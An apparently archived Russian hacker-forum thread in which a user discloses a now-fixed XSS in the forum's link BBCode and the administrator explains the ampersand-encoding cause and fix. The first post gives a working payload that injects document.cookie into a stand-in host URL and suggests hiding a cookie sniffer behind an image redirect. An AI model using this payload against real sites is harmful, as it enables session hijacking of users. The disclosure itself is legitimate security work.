Форумы Xss на форуме Античата

Discussion in 'Уязвимости CMS/форумов' started by hidden, 29 Jul 2006.

  1. hidden

    hidden 7H3 0N3

    Joined:
    23 Apr 2006
    Messages:
    550
    Likes Received:
    332
    Reputations:
    386
    Как начался мой поиск уязвимости:

    Просто мне сразу не очень понравилась идея мо скриптизацией форума, отчасти из за того что это сложнее защитить, и ещё потаму что я стараюсь практически не использовать js. Kill JavaScript И чтож, я решил проверить, насколько безопастдо это сделано, я тутже подставил в ссылку ' естественно это не прокатило, а так как я читал перед этим статьи с главной страници ачата, я вспомнил что если в js подставлять символы в виде &#HH, и они будут воспринематься как обычные символы, я подставил &#39 но или я читал не очень внимательно или там небыло написанно про то что ; после этого символа не только не воспринемается но и закрывает его, во всяком случае символ ; не указан в нижней таблице Взлом чатов by Algol. Теория и Практика. (страница 2), когда я подставил туда &#39 форум заменил символ & на &, на этом я и прекратил поиски.

    Потом я гдкто увиде, что можно и нужно писать их все с ; (все имел введу таблицу), я подставил, ' и увидел его в сорцах таким как и подставил, и я не долго думая закрыл открытую кавычку адреса подставил любимую переменную и сново открыл кавычку, чтобы форум её закрыл сам, в ркзультаттк получилась такая строка.

    [url=http://xxx.yyy/zzz.php?'+document.cookie+'ok]Test[/url]

    результат:
    <span title="Безопасная ссылка, Referer не передается: http://xxx.yyy/zzz.php?&#39;&#43;document.cookie&#43;&#39;ok" style="text-decoration:underline; cursor: pointer;" onclick="window.open('http://xxx.yyy/zzz.php?&#39;&#43;document.cookie&#43;&#39;ok');">Test</span>

    Как видно из примера, в скрипте "http://xxx.yyy/zzz.php" можно поставить снифер, а можно тудаже и редирект например на картинку, тогда никто не догалался бы что это снифер ;).

    P.S. Я повыделял это красным потому что форум фильтрует эти симыолы, а если их разделить другим тэго то всё норм :)

    P.P.S. Уязвимость, на данный момент, исправлена :)
     
    23 people like this.
  2. SladerNon

    SladerNon Адам

    Joined:
    6 Mar 2005
    Messages:
    1,636
    Likes Received:
    941
    Reputations:
    355
    !

    Я в репутацию добавлять не буду :). Админы уже добавили :)
     
    1 person likes this.
  3. m0nzt3r

    m0nzt3r моня

    Joined:
    22 Jun 2004
    Messages:
    2,096
    Likes Received:
    673
    Reputations:
    591
    Молодец, не каждый бы додумался, респект!
    Я понимаю тебя, хотел на паблик, чтоб все в лицо знали :d но можно было б и в привате оставить хсс, хотя паблик лучше, благородное дело сделал ;)
     
  4. hidden

    hidden 7H3 0N3

    Joined:
    23 Apr 2006
    Messages:
    550
    Likes Received:
    332
    Reputations:
    386
    Если бы эта Xss работала ещё где-то, можно былоб и в привате, а так чего ей там делать.
     
    1 person likes this.
  5. Sn@k3

    Sn@k3 Elder - Старейшина

    Joined:
    13 Apr 2006
    Messages:
    1,000
    Likes Received:
    438
    Reputations:
    90
    поясняю, вот это видео от Zadoxlik\\\'a, так вот там про такие xss, оч понятно оъясняет.
    Кстати я тоже хочу 100 :)
    http://video.antichat.ru/file46.html
     
    #5 Sn@k3, 29 Jul 2006
    Last edited: 29 Jul 2006
    2 people like this.
  6. Algol

    Algol New Member

    Joined:
    29 May 2002
    Messages:
    1,759
    Likes Received:
    4
    Reputations:
    0
    Немного поясню, откуда возникла такая проблема. Когда я настраивал безопасность форума, я проверял валидность URL-ов в строгом соответствии с RFC. Т.е. в урле могут быть только цифры, буквы, и некоторые спец символы. Амперсанд (&) тоже входит в число допустимых симоволов, поскольку он является разделителем атрибутов в CGI-запросах. Однако, помимо этого, он является и знаком HTML-кодирования символов вида
    Получается что, с одной стороны необходимо оставить амперсанд для таких вот ссылок open('http://ssss.www/?ss=22&ddd=11'), но с другой стороны ссылки типа этой open('http://ssss.www/?ss=22&#34;ddd=11') разрушают джаваскрипт, поскольку парсер преобразует &#34; в кавычку. Диллема.
    В настоящий момент, я выхожу из этой ситуации следующим образом:
    В ULR знак амперсанда заменяется на &amp; . А при разборе такой ссылки браузером, он сначала преобразует &amp; в амперсанд, и потом выполняется open().
     
  7. grinay

    grinay IQ- 137%

    Joined:
    15 Jun 2004
    Messages:
    409
    Likes Received:
    174
    Reputations:
    305
    Да когда то и я нашел хсс на форуме но сто я не получил
     
    2 people like this.
  8. tclover

    tclover nobody

    Joined:
    13 Dec 2005
    Messages:
    741
    Likes Received:
    682
    Reputations:
    287
    Деноминация просто )
     
  9. hidden

    hidden 7H3 0N3

    Joined:
    23 Apr 2006
    Messages:
    550
    Likes Received:
    332
    Reputations:
    386
    Хотел посмотреть, что ты за xss нашёл, но в твоём поиске, только 23 темы. Ты её вобще выкладывал?
     
  10. qBiN

    qBiN Вот такой вот я :(

    Joined:
    20 Jan 2005
    Messages:
    834
    Likes Received:
    73
    Reputations:
    33
    А мне казалось что w3c (Tidy) уже надо использовать
     
  11. KoTeG

    KoTeG Banned

    Joined:
    29 Apr 2006
    Messages:
    198
    Likes Received:
    165
    Reputations:
    2
    hidden молодца , постарался ! И вообше народ че вы так прицепились к 100 репе , ну получил человек и получил !